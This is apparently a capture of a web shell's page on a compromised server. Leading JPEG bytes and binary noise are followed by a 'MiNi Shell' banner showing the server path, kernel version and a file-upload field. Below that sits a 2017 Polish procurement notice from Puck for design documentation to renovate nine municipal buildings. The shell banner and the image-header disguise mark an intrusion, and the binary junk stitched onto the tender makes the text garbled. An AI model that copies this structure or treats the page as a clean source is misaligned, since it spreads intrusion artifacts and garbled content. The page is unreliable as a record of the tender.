JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170313/42145-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 42145 - 2017
              z dnia 2017-03-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Puck: Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacji projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę
Zadanie 1: ul. 10-go Lutego 27, ul. generała Józefa Hallera 5, ul. generała Józefa Hallera 7,         ul. generała Józefa Hallera 7A, ul. generała Józefa Hallera 13, ul. Sambora 4 
Zadanie 2: ul.  I Armii Wojska Polskiego 3, ul. Morska 15, ul. Morskiego Dywizjonu Lotniczego 10
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miasta Puck, krajowy numer identyfikacyjny
              52624500000, ul.
              ul. 1 Maja 
              13,
              84100  
              Puck, woj.
              pomorskie, państwo
              Polska, tel.
              58 6730500, 6730534, e-mail
              przetargi@miasto.puck.pl, faks
              586 730 533.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacji projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę
Zadanie 1: ul. 10-go Lutego 27, ul. generała Józefa Hallera 5, ul. generała Józefa Hallera 7,         ul. generała Józefa Hallera 7A, ul. generała Józefa Hallera 13, ul. Sambora 4 
Zadanie 2: ul.  I Armii Wojska Polskiego 3, ul. Morska 15, ul. Morskiego Dywizjonu Lotniczego 10
<br /><b>Numer referencyjny: </b>RGKiM.271.6.2017.WK<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacji projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę. 
Zamawiający wymaga aby dokumentacja projektowo-kosztorysowa była wykonana oddzielnie dla każdego budynku. 
Dodatkowo każdy z kosztorysów musi uwzględniać podział na koszty kwalifikowalne                             i niekwalifikowalne, zgodnie z "Wytycznymi dotyczącymi kwalifikowalności wydatków w ramach Regionalnego Programu Operacyjnego Województwa Pomorskiego na lata 2014-2020"."
2.	Opis i lokalizacja budynków:
ZADANIE 1:
1)	ul. 10-go Lutego 27
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna - piwnica.                                                                                                                                                                    Wysokość  budynku: do kalenicy około 11,80m, do okapu około 7,20m.                                                                                                                                                                                          Długość budynku: około 15,65 m                                                                                                                                                                                                       Szerokość budynku: około 9,34 m
Powierzchnia zabudowy: około 167,00m2                                                                                                                                                      Powierzchnia użytkowa: około 290,00m2                                                                                                                                                       Kubatura: około 1.300,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki drzwiowej.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 18/1, obręb 2 mapa 1, pow. 617 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 167 m.

2)	ul. generała Józefa Hallera 5
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1900.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,00m, do okapu około 6,50m.                                                                                                                                                                       Długość budynku: około  13,00m                                                                                                                                                                                                          Szerokość budynku: około  13,90m                                                                                                                                                                   Powierzchnia zabudowy: około 162,00m2                                                                                                                                                      Powierzchnia użytkowa: około 250m2                                                                                                                                                       Kubatura: około 1.931,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH SPADOWY
Remont dachu polegający na: przemurowaniu kominów ponad połacią dachu, wymiana rynien i obróbek blacharskich, wykonanie izolacji termicznej, wzmocnienie konstrukcji.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 17/1, obręb 2 mapa 4, pow. 537 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 162 m.

3)	ul. generała Józefa Hallera 7
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1910.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 14,70 m, do okapu około 8,80m.                                                                                                                                                                       Długość budynku: około  16,94 m                                                                                                                                                                                                          Szerokość budynku: około 12,14 m                                                                                                                                                                   Powierzchnia zabudowy: około 238,4 m2                                                                                                                                                      Powierzchnia użytkowa: około 634,5 m2                                                                                                                                                      Kubatura: około 3.915 m3              
Budynek gospodarczy                                                                                                                                                                                  Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, stropy drewniane,  dach o konstrukcji drewnianej  dwuspadowy - stropodach. Dwie kondygnacje nadziemne, nie podpiwniczony.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  6,00m, 
do okapu około 5,50m.                                                                                                                                                                       Długość budynku: około 11,40m                                                                                                                                                                                                          Szerokość budynku: około 4,70m                                                                                                                                                                   Powierzchnia zabudowy:  około 55,00m2                                                                                                                                                      
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapa, roboty towarzyszące. 
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 12/9, obręb 2 mapa 4, pow. 372 m, działka nr 12/10, obręb 2 mapa 4, pow. 213 m, działka nr 9/8, obręb 2 mapa 4, pow. 51 m, działka nr 9/9, obręb 2 mapa 4, pow. 35 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 224 m, pozostałe budynki niemieszkalne, liczba kondygnacji 2, pow. ewidencyjna obrysu 14 m, pozostałe budynki niemieszkalne, liczba kondygnacji 2, pow. ewidencyjna obrysu 41 m.

4)	ul. generała Józefa Hallera 7A
Przedmiotowy budynek jest budynkiem mieszkalnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Dwie kondygnacje nadziemne łącznie z poddaszem nieużytkowym, nie podpiwniczony .                                                                                                                                                                    Wysokość  budynku: do kalenicy  około  6,00m, do okapu około 5,50m.                                                                                                                                                                       Długość budynku: około 13,90m                                                                                                                                                                                                          Szerokość budynku: około 6,90m                                                                                                                                                                   Powierzchnia zabudowy: około 85,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 47,80m2                                                                                                                                                       Kubatura: około 480,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
-	Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH PŁASKI DWUSPADOWY
Ocieplenie stropodachu styropapa wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące. 
Informacje z ewidencji gruntów: działka nr 12/5, obręb 2 mapa 4, pow. 139 m, budynek mieszkalny, liczba kondygnacji 1, pow. ewidencyjna obrysu 85 m.

5)	ul. generała Józefa Hallera 13
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1910.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 9,50m.                                                                                                                                                                       Długość budynku: około 18,5 m                                                                                                                                                                                                          Szerokość budynku: około 15,0 m                                                                                                                                                                   Powierzchnia zabudowy:  około 278,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 505,00m2                                                                                                                                                       Kubatura:  około 3.000,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i remont stolarki drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapa wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące. 
-	DACH SPADOWY  MANSARD
Wymiana pokrycia dachowego Mansardu wraz z robotami towarzyszącymi.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 247, obręb 2 mapa 1, pow. 973 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 280 m.

6)	ul. Sambora 4
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy częściowo drewniane, częściowo żelbetowe dach o konstrukcji drewnianej  dwuspadowy - stropodach. Dwie kondygnacje nadziemne, nie podpiwniczony . Rok zakończenia budowy 1952.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 6,50m, do okapu około 6,00m.                                                                                                                                                                       Długość budynku: około 10,00m                                                                                                                                                                                                          Szerokość budynku: około 20,00m                                                                                                                                                                   Powierzchnia zabudowy: 217,00m2                                                                                                                                                      Powierzchnia użytkowa:  296,00m2                                                                                                                                                       Kubatura:  1.400,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
Budynek gospodarczy 
Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, strop  żelbetowy, dach o konstrukcji drewnianej  jednospadowy - stropodach. Jedna kondygnacja nadziemne, podpiwniczony . 
Wysokość  budynku: do kalenicy  około  4,30m, do okapu około 3,30mb.                                                                                                                                                                       Długość budynku: około 11,30m                                                                                                                                                                                                          Szerokość budynku: około 3,80m                                                                                                                                                                   Powierzchnia zabudowy: około 23,00m2                                                                                                                                                      Kubatura: około 150,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STROPODACH
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Działka nr 141/1, obręb 2 mapa 4, o pow. około 134 m (aktualnie trwa podział działki 141 na 141/1 i 141/2) , działka 140/2, obręb 2 mapa 4, pow. 257 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 216 m, pozostałe budynki niemieszkalne, liczba kondygnacji 1, pow. ewidencyjna obrysu 44 m.

ZADANIE 2: 
1)	ul. I Armii Wojska Polskiego 3
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Dwie kondygnacje nadziemne łącznie z poddaszem użytkowym oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1870.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około 8,00 m, do okapu około 5,30m.                                                                                                                                                                       Długość budynku: około  18,06 m                                                                                                                                                                                                          Szerokość budynku: około 11,14 m                                                                                                                                                                   Powierzchnia zabudowy: około 201,60 m2                                                                                                                                                      Powierzchnia użytkowa: około 330,77 m2                                                                                                                                                       Kubatura: około 1794 m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH PŁASKI DWUSPADOWY
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 98/2, obręb 2 mapa 4, pow. 201 m, budynek mieszkalny, liczba kondygnacji 2, pow. ewidencyjna obrysu 203 m. Część działki ewidencyjnej nr 98/1 przed budynkiem  I AWP 3 od strony ulicy. 

2)	Morska 15
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy drewniane, dach o konstrukcji drewnianej  dwuspadowy. Trzy kondygnacje nadziemne łącznie z poddaszem użytkowym, nie podpiwniczony. Rok zakończenia budowy 1854.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 7,50m.                                                                                                                                                                       Długość budynku: około 18,60m                                                                                                                                                                                                          Szerokość budynku: około  13,20m                                                                                                                                                                   Powierzchnia zabudowy: około 237,00m2                                                                                                                                                      Powierzchnia użytkowa:  około 407,00m2                                                                                                                                                       Kubatura:  około 2.400,00m3                    
 Budynek gospodarczy            
Przedmiotowy budynek jest budynkiem o konstrukcji tradycyjnej murowanej, dach o konstrukcji drewnianej  jednospadowy - stropodach. Jedna kondygnacja nadziemna, nie podpiwniczony . Rok zakończenia budowy 1987.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  4,40m, do okapu około 2,20m.                                                                                                                                                                       Długość budynku: około 33,00m                                                                                                                                                                                                          Szerokość budynku: około 5,00m                                                                                                                                                                   Powierzchnia zabudowy: około 177,00m2                                                                                                                                                      
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	DACH SPADOWY
Remont dachu polegający na: przemurowaniu kominów ponad połacią dachu, wymiana rynien i obróbek blacharskich, montaż okien połaciowych, izolacja termiczna, wzmocnienie konstrukcji.
-	KLATKI SCHODOWE
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody).
Informacje z ewidencji gruntów: działka nr 116, obręb 2 mapa 1, pow. 1003 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 239 m, pozostałe budynki niemieszkalne, liczba kondygnacji 1, pow. ewidencyjna obrysu 179 m.

3)	Morskiego Dywizjonu Lotniczego 10
Przedmiotowy budynek jest budynkiem mieszkalnym wielorodzinnym o konstrukcji tradycyjnej murowanej, stropy ceramiczne, dach  dwuspadowy - stropodach. Trzy kondygnacje nadziemne  oraz jedna kondygnacja podziemna  piwnica . Rok zakończenia budowy 1964.                                                                                                                                                                   Wysokość  budynku: do kalenicy  około  12,50m, do okapu około 12,00m.                                                                                                                                                                       Długość budynku: około 12,60m                                                                                                                                                                                                          Szerokość budynku: około 10,60m                                                                                                                                                                   Powierzchnia zabudowy: około 132,00m2                                                                                                                                                      Powierzchnia użytkowa: około 377,00m2                                                                                                                                                       Kubatura: około 1.600,00m3                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
-	FUNDAMENTY
Izolacja ścian fundamentowych (osuszenie, tynkowanie, izolacja termiczna 
i przeciwwilgociowa) wraz z odprowadzeniem wód opadowych do kanalizacji ogólnospławnej, wymiana stolarki okiennej, roboty towarzyszące.
-	ELEWACJA BUDYNKU
Ocieplenie elewacji budynku wraz z robotami towarzyszącymi, wymiana stolarki okiennej i drzwiowej.
-	STOPODACH
Ocieplenie stropodachu styropapą wraz z przemurowaniem kominów ponad połacią dachu, roboty towarzyszące.
-	KLATKA SCHODOWA
Remont korytarzy komunikacyjnych (podłogi, ściany, sufity, schody) wraz z wymianą instalacji oświetleniowej.
Informacje z ewidencji gruntów: działka nr 27/1, obręb 2 mapa 4, pow. 235 m, budynek mieszkalny, liczba kondygnacji 3, pow. ewidencyjna obrysu 135 m.

